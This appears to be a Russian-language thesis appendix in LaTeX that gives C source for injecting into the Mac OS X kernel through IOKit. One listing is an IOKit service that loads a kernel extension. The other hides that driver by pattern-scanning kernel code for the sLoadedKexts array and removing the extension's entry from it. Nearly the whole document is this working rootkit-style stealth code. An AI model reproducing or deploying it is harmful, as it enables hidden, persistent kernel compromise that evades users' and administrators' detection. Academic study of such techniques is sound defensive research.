\chapter{Реализация алгоритма внедрения через подсистему IOKit}
\label{app:iokit_intrusion_algorithm_source_code}
\starttext
В данном приложении содержится исходный код реализации алгоритма внедрения в ядро операционной системы Mac OS X через подсистему IOKit.

Исходный код основной части алгоритма:

\begin{lstlisting}[language=C]
#include "iokitloader.h"

OSDefineMetaClassAndStructors(IOKitLoader, IOService)

bool IOKitLoader::start(IOService* provider)
{
	bool         result = false;
	OSReturn     error = kOSReturnSuccess;
	
	result = IOService::start(provider);
	if (result == false)
	{
		LogErr("Can't start provider!\n");
		return false;
	}
	
	LogDbg("Try to check  in loads...\n");
	if (WasLoaded())
	{
		LogDbg(" was loaded, exit!\n");
		return false;
	}
	LogDbg("DONE!\n");
	
	LogDbg("Try to load .kext...\n");
	error = OSKextLoadKextWithIdentifier(_KEXT_IDENTIFIER);
	if (error != kOSReturnSuccess && error != kOSKextReturnDeferred)
	{
		LogErr("Can't load .kext with error code = %d!\n", error);
		return false;
	}
	LogDbg("DONE!\n");
	
	LogDbg("Try to mark that  was loaded...\n");
	error = MarkThatWasLoaded();
	if (error != 0)
	{
		LogErr("Can't mark that  was loaded!\n");
		return false;
	}
	LogDbg("DONE!\n");
	
	return false;
}
\end{lstlisting}

Исходный код скрытия драйвера:

\begin{lstlisting}[language=C]
#include "kext_hiding.h"

#include <libkern/c++/OSArray.h>

#define LOOKUP_KEXT_WITH_LT_SM        "__ZN6OSKext21lookupKextWithLoadTagEj"

#define GET_IDENTIFIER_C_STRING       "__ZN6OSKext20getIdentifierCStringEv"

#define SEARCH_FUNC_LEN               256

#define CALL_INSTRUCT_SIZE            5

#define MOV_INSTRUCT_SIZE             7

static uint8                          g_callOpcode[] = {0xE8};

static uint8                          g_movOpcode[] = {0x48, 0x8B, 0x3D};

static const char* (*getIdentifierCString)(void) = NULL;

static OSArray* FindSLoadedKexts(void)
{
	uint8     *lookupKextWithLoadTagPtr = NULL;
	uint8     *currentPtr = NULL;
	uint8     *endSearchPtr = NULL;
	
	int       functionOffset = 0;
	uint8     *functionAddress = NULL;
	
	int       sLoadedKextsOffset = 0;
	uint8     *sLoadedKextsAddress = NULL;
	
	lookupKextWithLoadTagPtr = (uint8*)FindKernelSymbol(LOOKUP_KEXT_WITH_LT_SM);
	if (lookupKextWithLoadTagPtr == NULL)
	{
		LogErr("Can't find lookupKextWithLoadTag pointer!\n");
		return NULL;
	}
		
	endSearchPtr = lookupKextWithLoadTagPtr + SEARCH_FUNC_LEN;
	currentPtr = lookupKextWithLoadTagPtr;
	do
	{
		if (memcmp(currentPtr, g_callOpcode, sizeof(g_callOpcode)) == 0)
		{
			functionOffset = *(int*)(currentPtr + sizeof(g_callOpcode));
			
			functionAddress = currentPtr + CALL_INSTRUCT_SIZE + functionOffset;

			if (functionAddress == (uint8*)IORecursiveLockLock)
			{
				currentPtr = currentPtr + CALL_INSTRUCT_SIZE;
				if (memcmp(currentPtr, g_movOpcode, sizeof(g_movOpcode)) == 0)
				{
					sLoadedKextsOffset = *(int*)(currentPtr +
					                             sizeof(g_movOpcode));
					sLoadedKextsAddress = currentPtr +
					                      MOV_INSTRUCT_SIZE +
					                      sLoadedKextsOffset;
					break;
				}
			}
		}
		
		currentPtr = currentPtr + 1;
	} while (currentPtr <= endSearchPtr);
	
	return *(OSArray**)(sLoadedKextsAddress);
}

static int TryToHideKextWithIdentifierFromSLoadedKexts(OSArray *sLoadedKexts,
                                                       const char *kextId)
{
	uint32_t     i = 0;
	uint32_t     count = 0;
	
	void         *currentKext = NULL;
	
	char         *currentKextIdentifier = NULL;
	
	getIdentifierCString = (const char* (*)(void))
	                        FindKernelSymbol(GET_IDENTIFIER_C_STRING);
	if (getIdentifierCString == NULL)
	{
		LogErr("Can't find getIdentifierCString pointer!\n");
		return -E_NOENT;
	}
				
	count = sLoadedKexts->getCount();
	for (i = 0; i < count; ++i)
	{
		currentKext = (void*)sLoadedKexts->getObject(i);
		
		asm volatile("mov %0, %%rdi;"
		             :/* no outputs */
		             :"r" (currentKext)
		             :"%rdi");
		
		currentKextIdentifier = (char*)getIdentifierCString();
		if (strncmp(kextId,
		            currentKextIdentifier,
		            strlen(kextId)) == 0)
		{
			sLoadedKexts->getObject(i)->retain();
			sLoadedKexts->removeObject(i);
			return 0;
		}
	}
	
	return -E_NOENT;
}
\end{lstlisting}

\stoptext
